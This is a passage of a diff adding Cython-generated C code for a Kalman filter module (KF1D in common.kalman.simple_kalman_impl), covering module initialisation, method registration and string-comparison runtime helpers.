__pyx_kp_s_stringsource, __pyx_n_s_pyx_unpickle_KF1D, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__10)) __PYX_ERR(2, 1, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + __pyx_int_54762874 = PyInt_FromLong(54762874L); if (unlikely(!__pyx_int_54762874)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_230653288 = PyInt_FromLong(230653288L); if (unlikely(!__pyx_int_230653288)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_int_266195929 = PyInt_FromLong(266195929L); if (unlikely(!__pyx_int_266195929)) __PYX_ERR(0, 1, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + return 0; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6common_6kalman_18simple_kalman_impl_KF1D_spec, NULL); if (unlikely(!__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D)) __PYX_ERR(0, 4, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6common_6kalman_18simple_kalman_impl_KF1D_spec, __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D) < 0) __PYX_ERR(0, 4, __pyx_L1_error) + #else + __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D = &__pyx_type_6common_6kalman_18simple_kalman_impl_KF1D; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D) < 0) __PYX_ERR(0, 4, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D->tp_dictoffset && __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_KF1D, (PyObject *) __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D) < 0) __PYX_ERR(0, 4, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D) < 0) __PYX_ERR(0, 4, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_simple_kalman_impl(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_simple_kalman_impl}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "simple_kalman_impl", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initsimple_kalman_impl(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initsimple_kalman_impl(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_simple_kalman_impl(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_simple_kalman_impl(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_simple_kalman_impl(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'simple_kalman_impl' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("simple_kalman_impl", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to simple_kalman_impl pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_simple_kalman_impl(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_common__kalman__simple_kalman_impl) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "common.kalman.simple_kalman_impl")) { + if (unlikely((PyDict_SetItemString(modules, "common.kalman.simple_kalman_impl", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_type_import_code(); + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "common/kalman/simple_kalman_impl.pyx":22 + * self.A_K_3 = self.A1_1 - self.K1_0 * self.C0_1 + * + * def update(self, meas): # <<<<<<<<<<<<<< + * cdef double x0_0 = self.A_K_0 * self.x0_0 + self.A_K_1 * self.x1_0 + self.K0_0 * meas + * cdef double x1_0 = self.A_K_2 * self.x0_0 + self.A_K_3 * self.x1_0 + self.K1_0 * meas + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_6kalman_18simple_kalman_impl_4KF1D_3update, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_KF1D_update, NULL, __pyx_n_s_common_kalman_simple_kalman_impl_2, __pyx_d, ((PyObject *)__pyx_codeobj__4)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D->tp_dict, __pyx_n_s_update, __pyx_t_2) < 0) __PYX_ERR(0, 22, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_6kalman_18simple_kalman_impl_4KF1D_5__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_KF1D___reduce_cython, NULL, __pyx_n_s_common_kalman_simple_kalman_impl_2, __pyx_d, ((PyObject *)__pyx_codeobj__6)); if (unlikely(!__pyx_t_2)) __PYX_ERR(2, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D->tp_dict, __pyx_n_s_reduce_cython, __pyx_t_2) < 0) __PYX_ERR(2, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D); + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle_KF1D, (type(self), 0xfddd3d9, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle_KF1D__set_state(self, __pyx_state) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_6kalman_18simple_kalman_impl_4KF1D_7__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_KF1D___setstate_cython, NULL, __pyx_n_s_common_kalman_simple_kalman_impl_2, __pyx_d, ((PyObject *)__pyx_codeobj__8)); if (unlikely(!__pyx_t_2)) __PYX_ERR(2, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D->tp_dict, __pyx_n_s_setstate_cython, __pyx_t_2) < 0) __PYX_ERR(2, 16, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + PyType_Modified(__pyx_ptype_6common_6kalman_18simple_kalman_impl_KF1D); + + /* "(tree fragment)":1 + * def __pyx_unpickle_KF1D(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_6kalman_18simple_kalman_impl_1__pyx_unpickle_KF1D, 0, __pyx_n_s_pyx_unpickle_KF1D, NULL, __pyx_n_s_common_kalman_simple_kalman_impl_2, __pyx_d, ((PyObject *)__pyx_codeobj__10)); if (unlikely(!__pyx_t_2)) __PYX_ERR(2, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_pyx_unpickle_KF1D, __pyx_t_2) < 0) __PYX_ERR(2, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/kalman/simple_kalman_impl.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: language_level=3 + * + */ + __pyx_t_2 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init common.kalman.simple_kalman_impl", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init common.kalman.simple_kalman_impl"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject 